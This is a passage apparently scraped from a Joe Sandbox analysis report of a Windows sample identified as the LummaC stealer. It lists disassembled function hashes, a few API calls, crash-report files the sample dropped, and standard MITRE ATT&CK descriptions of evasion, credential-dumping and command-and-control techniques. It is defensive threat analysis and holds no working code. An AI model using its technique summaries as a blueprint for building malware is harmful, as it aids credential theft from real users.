Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0195ff22bc3b67a48e0e57b27cdd428415b416d7eb2fd4c47018d448268a19ee
Instruction ID: 323fc6218cea3305572900b5d46b7e086bf09e9d91523618513d5d3fdfb84df2
Opcode Fuzzy Hash: 0195ff22bc3b67a48e0e57b27cdd428415b416d7eb2fd4c47018d448268a19ee
Instruction Fuzzy Hash: 741177343093209B9A198F24716063FBBA2AB97B14FA5652ED98217750C224ED16CBDF

Function 0040C224 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd4b45de63c3dd4b4d54165f33b09b04a9dc2e1438e93676a650e7e2c70131f4
Instruction ID: 5e13abacc2ad6a51e6be12efd643edf794c78630c18e36d079d3e7dd80fead49
Opcode Fuzzy Hash: cd4b45de63c3dd4b4d54165f33b09b04a9dc2e1438e93676a650e7e2c70131f4
Instruction Fuzzy Hash: 3C01D47860A6918BD7098FB4C49162BBB23BF82300B28D16ED4161FF5ADA34E415C749

Function 00432247 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 94COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00432272

Strings

E, xrefs: 004322D1
P, xrefs: 004322A1
M, xrefs: 004322B1
D, xrefs: 004322A9
G, xrefs: 00432299
I, xrefs: 004322C1
^, xrefs: 00432291
], xrefs: 00432289
V, xrefs: 004322D9
^, xrefs: 004322C9

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitVariant
String ID: D$E$G$I$M$P$V$]$^$^
API String ID: 1927566239-2592861624
Opcode ID: aa7b5f887987e17e9369c7b62c587c5c4aad096d599b7b8d9a86b60c5cf73a52
Instruction ID: 4f84bbc71567c9c34e0298bf8bff6b46d288640b3b08763d0babfb3ed61e7620
Opcode Fuzzy Hash: aa7b5f887987e17e9369c7b62c587c5c4aad096d599b7b8d9a86b60c5cf73a52
Instruction Fuzzy Hash: D1418961108BC18AD725CF3CC888702BFA16BA6224F1987DCD8E94F3EBC678D505C766

Function 00433B99 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00433BD7
GetSystemMetrics.USER32 ref: 00433BE6

Strings

, xrefs: 00433C91

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 81c340c43b8454b1a6cf376c783d0f63086a51cc65df73aaeab75bca73f9757c
Instruction ID: cd5cc318eb1e32412ddb51e6d631dad47c2fb6b2673f7cc346886bbfae7eef40
Opcode Fuzzy Hash: 81c340c43b8454b1a6cf376c783d0f63086a51cc65df73aaeab75bca73f9757c
Instruction Fuzzy Hash: 7831A2B49143509FDB40EF6CD98464DBBF4BF89304F41892DE498DB360D7B4A958CB86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_8ef93764243ab4ee0761b126a9e6f5fe64f6ecf_8f5062a8_ae4341b8-e8e1-4fbe-9ccd-d8012edd11e1\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE59.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE89.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
file.exe

Function 00437DD0 Relevance: 34.0, APIs: 11, Strings: 8, Instructions: 726
memorycomCOMMON

Function 0040E7E4 Relevance: 23.1, APIs: 2, Strings: 13, Instructions: 577
COMMON

Function 004278A0 Relevance: 18.3, APIs: 1, Strings: 9, Instructions: 798
COMMON

Function 0041A273 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 414
COMMON

Function 00424950 Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 629
COMMON

Function 0042CB9F Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 514
COMMON

Function 0040AC40 Relevance: 7.9, Strings: 6, Instructions: 442
COMMON

Function 004087A0 Relevance: 7.6, APIs: 5, Instructions: 142
threadCOMMON

Function 0042D1A4 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 370
COMMON

Function 00417FB0 Relevance: 5.3, Strings: 4, Instructions: 329
COMMON

Function 0040D072 Relevance: 5.3, Strings: 4, Instructions: 279
COMMON

Function 00422BA0 Relevance: 4.4, Strings: 3, Instructions: 619
COMMON